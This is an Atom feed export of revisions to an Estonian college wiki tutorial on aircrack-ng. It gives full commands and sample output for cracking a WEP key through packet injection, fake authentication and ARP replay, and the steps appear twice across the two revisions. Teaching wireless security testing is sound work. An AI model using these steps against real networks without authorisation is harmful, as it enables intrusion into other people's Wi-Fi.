&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89282</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89282"/>
		<updated>2015-05-25T19:13:33Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
